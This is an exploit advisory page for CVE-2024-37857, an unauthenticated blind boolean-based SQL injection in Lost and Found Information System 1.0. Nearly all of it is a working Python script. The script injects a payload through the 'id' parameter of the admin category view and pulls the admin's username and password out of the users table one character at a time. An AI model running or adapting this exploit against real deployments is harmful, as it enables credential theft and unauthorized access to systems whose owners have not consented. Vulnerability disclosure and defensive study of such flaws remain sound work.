Headline
Lost And Found Information System 1.0 SQL Injection
Lost and Found Information System version 1.0 suffers from an unauthenticated blind boolean-based remote SQL injection vulnerability.
# Exploit Title: Unauthenticated Blind Boolean-Based SQL Injection Exploit - Lost and Found Information System # Exploit Author: Amit Roy (Rezur / AR0x7)# Date: June 07, 2024# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip# Tested on: Kali Linux, Apache, Mysql# Version: v1.0# Exploit Description:# Lost and Found Information System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack.# CVE : CVE-2024-37857import requests,string,sys,argparser = requests.Session()proxies = {'http': 'http://127.0.0.1:8080'}admin_path = "/php-lfis/admin/index.php"createCategory_path = "/php-lfis/classes/Master.php"def char_extract(rhost, payload): params = {"page": "categories/view_category", "id": payload} response = r.get(rhost+admin_path, params=params) if "Category ID is not valid" not in response.text: return True else: return False def sqli(rhost, column): charset = string.printable output_length = 200 output = "" for i in range(output_length): for char in charset: # Extracts the credentials of user with id=1, admin by default payload = "13371337' or char(%s) = (select substring(%s,%s,1) from users where id=1)-- -" % (ord(str(char)),str(column),str(i+1)) sys.stdout.write(f"\r[*] Extracting: {output}\r") if char_extract(rhost, payload): output += char break elif char == '~' and not char_extract(rhost, payload): print("[*] Extracting:",output) return outputdef argsetup(): about = 'Unauthenticated Blind Boolean-Based SQL Injection Exploit - Lost and Found Information System (https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html)' parser = argparse.ArgumentParser(description=about) parser.add_argument('-t', '--target', help='Target ip address or hostname. Example : "http://localhost"', required=True) args = parser.parse_args() return argsdef main(): args = argsetup() rhost = args.target print(sqli(rhost, 'username'),':',sqli(rhost, 'password'))if __name__ == "__main__": main()